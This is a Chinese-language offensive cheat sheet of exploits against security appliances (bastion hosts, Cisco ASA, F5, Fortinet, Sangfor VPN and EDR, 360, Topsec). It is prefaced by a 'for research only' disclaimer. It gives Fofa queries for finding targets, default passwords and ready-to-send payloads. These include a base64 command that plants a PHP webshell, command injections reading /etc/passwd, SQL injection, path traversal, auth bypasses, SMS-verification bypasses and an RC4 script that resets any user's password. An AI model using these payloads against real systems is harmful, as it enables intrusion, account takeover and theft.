Exploits

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

大纲

• 身份与访问控制

  • 堡垒机

    • 齐治堡垒机

    • H3C SecParh

    • teleport堡垒机

  • IMC

    • H3C IMC智能管理中心

• 网络检测与响应

  • 蜜罐

  • IDS

    • 绿盟 UTS 综合威胁探针

  • 防火墙

    • Cisco ASA

    • 网康下一代防火墙

    • 启明星辰 天清汉马USG防火墙

    • 佑友防火墙

    • zeroshell

    • Sophos XG

  • 网关

    • 上海格尔安全认证网关管理系统

    • 网康 NS-ASG 安全网关

  • 负载均衡

    • Citrix ADC

    • F5 BIG-IP

    • 天融信 Top-app LB

  • VPN

    • Fortigate SSL VPN

    • Palo Alto SSL VPN

    • Pulse Secure SSL VPN

    • 深信服 VPN

    • 锐捷 SSL VPN

  • 威胁感知

    • Sophos UTM

• 终端响应与检测

  • 杀软

  • EDR

    • 深信服 EDR

    • 360天擎

    • 金山 V8 终端安全系统

  • 数据防泄漏系统

    • 天融信数据防泄漏系统

---

身份与访问控制

堡垒机

齐治堡垒机

Fofa: app="齐治科技-堡垒机"

默认口令

• shterm/shterm

齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞

• 齐治堡垒机ShtermClient-2.1.1命令执行漏洞（CNVD-2019-09593）分析

  http://10.20.10.11/listener/cluster_manage.php
  https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
  /var/www/shterm/resources/qrcode/lbj77.php  密码10086

CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞

• 齐治堡垒机前台远程命令执行漏洞（CNVD-2019-20835）分析

CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞

• 齐治堡垒机后台存在命令执行漏洞（CNVD-2019-17294）分析

远程代码执行

• POC | Payload | exp

  POST /shterm/listener/tui_update.php
  
  a=["t';import os;os.popen('whoami')#"]

任意用户登录漏洞

• POC | Payload | exp

  /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

H3C SecParh

Fofa: app="H3C-SecPath-运维审计系统" && body="2018"

get_detail_view.php 任意用户登录漏洞

• POC | Payload | exp

  /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

teleport堡垒机

fofa: app="TELEPORT堡垒机"

相关文章

• teleport堡垒机审计学习
• 某开源堡垒机历史漏洞分析

任意用户登录漏洞

• POC | Payload | exp

  • teleport 堡垒机任意用户登录漏洞
  • 针对某堡垒机漏洞分析（一）

后台文件读取

• POC | Payload | exp

  /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

IMC

H3C IMC智能管理中心

远程代码执行

• H3C IMC智能管理中心漏洞复现

---

网络检测与响应

蜜罐

相关文章

• 【格物实验室】浅谈物联网蜜罐识别方法
• 红队遇蜜罐 莫慌
• 浅谈Mysql蜜罐识别
• 浅析开源蜜罐识别与全网测绘
• 蜜罐建设的一些思考

相关工具

• BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
• Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
• NS-Sp4ce/MoAn_Honey_Pot_Urls - X安蜜罐用的一些存在JSonp劫持的API

从蓝队溯源角度出发

• 分析样本

  • PC 名称

  • 语言

  • 常用函数、方法

  • 注释习惯、变量名习惯

• 前端漏洞反制

  • 浏览器记录、书签、cookie 等

  • 验证码、手机号、邮箱

  • 攻击时间段

• 后渗透反制

  • 钓鱼文件

  • ntlm中继

  • Rogue MySql Server

从红队角度出发

• 前台

  • 不支持正常浏览器，仅老版 IE

  • 仅支持老版本 flash

  • 不正常的 JS 文件，js 混淆

  • 仅 json 文件, 内含指纹

  • XSS、JSONP

  • 大量网络请求

  • 同站同 CMS 不同页面不同时间、CMS 版本

  • 任意口令登录?

  • 要求实名认证、或手机号注册

• 后渗透

  • 第二次登录后发现 history 记录全部清空

  • 开放了大量端口

  • docker 容器且无正常业务数据

  • 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的，而这真实的系统中是不可能的。

IDS

相关文章

• IDS逃避技术和对策
• 网络层绕过IDS/IPS的一些探索

绿盟 UTS 综合威胁探针

管理员任意登录

• POC | Payload | exp

  • 绿盟UTS综合威胁探针管理员任意登录
  • 【干货】绿盟UTS综合威胁探针管理员任意登录

---

防火墙

Cisco ASA

fofa: app="CISCO-ASA-5520"

CVE-2018-0296 Cisco ASA Directory Traversal

• 相关文章

  • CVE-2018-0296 Cisco ASA 拒绝服务漏洞分析
  • Opis błędu CVE-2018-0296 – ominięcie uwierzytelnienia w webinterfejsie Cisco ASA
• POC | Payload | exp

  • yassineaboukir/CVE-2018-0296
  • milo2012/CVE-2018-0296

CVE-2020-3187 任意文件删除

• POC | Payload | exp

  • https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html

CVE-2020-3452

• 描述

  Cisco Adaptive Security Appliance (ASA) 防火墙设备以及 Cisco Firepower Threat Defense (FTD)设备的 WEB 管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞，允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件，此漏洞不能用于获取对 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件的访问，所以只能读取 web 系统目录的文件，比如 webvpn 的配置文件、书签、网络 cookies、部分网络内容和超文本传输协议网址等信息。

  该漏洞源于 ASA 和 FTD 的 web 服务接口在处理 HTTP 请求的 URL 时缺乏正确的输入验证，导致攻击者可以在目标设备上查看系统内的任意文件。

  注意：当设备配置了 WebVPN 或 AnyConnect 功能，启用 Web 服务时，才会受到该漏洞影响，但是该漏洞不能用于访问 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件。

• 影响

  Cisco ASA 设备影响版本:

  • <9.6.1

  • 9.6 < 9.6.4.42

  • 9.71

  • 9.8 < 9.8.4.20

  • 9.9 < 9.9.2.74

  • 9.10 < 9.10.1.42

  • 9.12 < 9.12.3.12

  • 9.13 < 9.13.1.10

  • 9.14 < 9.14.1.10

• POC | Payload | exp

  /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

网康下一代防火墙

fofa: app="网康科技-下一代防火墙"

网康下一代防火墙 RCE

• POC | Payload | exp

  POST /directdata/direct/router HTTP/1.1
  
  {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

  访问：https://x.x.x.x/test_test.txt

启明星辰 天清汉马USG防火墙

弱口令

账号：useradmin
密码：venus.user

佑友防火墙

默认账号密码

User: admin
Pass: hicomadmin

后台命令执行漏洞

系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd

zeroshell

rce

• POC | Payload | exp

  • ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)

Sophos XG

CVE-2020-12271 && CVE-2020-15504

• 相关文章

  • Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

---

网关

上海格尔安全认证网关管理系统

相关文章

• 上海格尔安全认证网关管理系统命令执行漏洞大礼包
• 上海格尔软件安全认证网关命令执行漏洞（无需登录）
• 上海格尔软件安全认证网关命令执行漏洞（可批量getshell）

网康 NS-ASG 安全网关

Fofa : 网康 NS-ASG 安全网关

任意文件读取漏洞

• POC | Payload | exp

  /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd

---

负载均衡

Citrix ADC

默认口令

nsroot/nsroot

CVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞

• 相关文章

  • Citrix Gateway/ADC 远程代码执行漏洞分析
• POC | Payload | exp

  • trustedsec/cve-2019-19781
  • jas502n/CVE-2019-19781

F5 BIG-IP

CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞

• 相关文章

  • CVE-2020-5902——关于;号绕过认证技巧总结
  • F5 BIG-IP Remote Code Execution Exploit - CVE-2020-5902 | Critical Start
• POC | Payload | exp

  • jas502n/CVE-2020-5902
  • theLSA/f5-bigip-rce-cve-2020-5902

CVE-2021-22986 F5 BIG-IP RCE

• 相关文章

  • CVE-2021-22986：BIG-IP/BIG-IQ未授权RCE
  • F5 BIG-IP CVE-2021-22986 验证及利用
• POC | Payload | exp

  • h4x0r-dz/RCE-Exploit-in-BIG-IP
  • Al1ex/CVE-2021-22986

CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞

• 镜像下载

  • https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.5&container=15.1.5.1_Virtual-Edition

• 相关文章

  • F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive
  • CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
  • F5 BIG-IP本地环境搭建以及CVE-2022-1388复现

天融信 Top-app LB

SQL注入漏洞

• POC | Payload | exp

  • 天融信Top-app LB负载均衡SQL注入漏洞

    POST /acc/clsf/report/datasource.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=

未授权

• POC | Payload | exp

  • 天融信负载均衡TopApp-LB系统无需密码直接登录

    登录框
    ; ping xxx.dnslog.info; echo

RCE

• POC | Payload | exp

  • 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀

    用户名随意  密码：;id

---

VPN

Fortigate SSL VPN

fofa: icon_hash="-404383634" app="FORTINET-防火墙"

CVE-2018-13379 Fortigate SSL VPN 密码读取

• POC | Payload | exp

  • milo2012/CVE-2018-13379

CVE-2018-13382 Fortigate SSL VPN 任意密码重置

• POC | Payload | exp

  • milo2012/CVE-2018-13382

CVE-2022-40684 FortiOS Authentication Bypass

• 相关文章

  • FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)
• POC | Payload | exp

  • horizon3ai/CVE-2022-40684

    git clone https://github.com/horizon3ai/CVE-2022-40684.git
    cd CVE-2022-40684
    ssh-keygen -t rsa
    python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
    ssh admin@1.1.1.1

Palo Alto SSL VPN

CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞

• 相关文章

  • Orange: Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!
  • Palo Alto GlobalProtect上的PreAuth RCE
• POC | Payload | exp

  • securifera/CVE-2019-1579

Pulse Secure SSL VPN

CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞

• 相关文章

  • Pulse Secure 任意文件读取（CVE-2019-11510）漏洞
• POC | Payload | exp

  • projectzeroindia/CVE-2019-11510

CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞

• POC | Payload | exp

  • 0xDezzy/CVE-2019-11539

深信服 VPN

常见密码

admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b

口令爆破

• POC | Payload | exp

  • https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633

    用户登录，若多次尝试登录失败会要求输入验证码，若输入错误的验证码，会提示“校验码错误或校验码已过期”；修改登录请求的数据包，清空cookie和验证码字段的值即可绕过验证码，此时提示“用户名或密码错误”。
    /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=

短信绕过

• POC | Payload | exp

  POST https://路径/por/changetelnum.csp?apiversion=1
  
  newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1

任意密码重置

• POC | Payload | exp

  某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
  利用:需要登录账号
  
  M7.6.6R1版本key为20181118
  
  M7.6.1key为20100720
  
  POST /por/changepwd.csp
  
  sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)

  from Crypto.Cipher import ARC4
  from binascii import a2b_hex
  
  def myRC4(data, key):
      rc41= ARC4.new(key)
      encrypted =rc41.encrypt(data)
      return encrypted. encode('hex')
  
  def rc4_decrpt_hex(data, key):
      rc41= ARC4. new(key)
      return rc41. decrypt(a2b_hex(data))
  
  key= '20100720'
  data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
  print myRC4(data, key)

RCE

• 影响版本

  • SSLM7.6.6(20181120)

  • SSLM7.6.6R1(20181225)

• 相关文章

  • 深信服vpn逆向（挖洞）
• POC | Payload | exp

  https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1

锐捷 SSL VPN

FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"

锐捷 SSL VPN 越权访问漏洞

• 相关文章

  • 锐捷SSL VPN 越权访问漏洞
• POC | Payload | exp

  GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
  Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1

  UserName 参数为已知用户名

Juniper SSL VPN

相关文章

• Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities

---

威胁感知

Sophos UTM

CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞

• 相关文章

  • CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞分析

---

终端响应与检测

相关文章

• 绕过集中管控类安全软件小技巧

EDR/杀软

利用杀毒软件删除任意文件

• 相关文章

  • Exploiting (Almost) Every Antivirus Software

    • 利用杀毒软件删除任意文件

白名单信任文件

• 相关文章

  • 通过信任文件绕过火绒

clamav

• Re: [NSE] Unauthenticated ClamAV Command Exec

深信服 EDR

相关文章

• 深信服DER RCE 复现

2020.08命令执行

• 相关文章

  • 深信服终端检测响应平台 EDR 代码审计
• POC | Payload | exp

  • A2gel/sangfor-edr-exploit

2020.09命令执行

• POC | Payload | exp

  POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
  
  {"params":"w=123\"'1234123'\"|命令"}

后台任意用户登陆

• POC | Payload | exp

  xxx.xxx.xxx.xxx/ui/login.php?user=admin

360天擎

Fofa: title="360天擎"

前台SQL注入

• POC | Payload | exp

  /api/dp/rptsvcsyncpoint?ccid=1

数据库信息泄露漏洞

• POC | Payload | exp

  http://x.x.x.x/api/dbstat/gettablessize

金山 V8 终端安全系统

Fofa: title="在线安装-V8+终端安全系统Web控制台"

任意文件读取漏洞

• POC | Payload | exp

  /htmltopdf/downfile.php?filename=downfile.php

pdf_maker.php 命令执行漏洞

• 相关文章

  • 某终端安全系统Nday分析+复现
• POC | Payload | exp

  POST /inter/pdf_maker.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  
  url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx

---

数据防泄漏系统

天融信数据防泄漏系统

越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。

POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1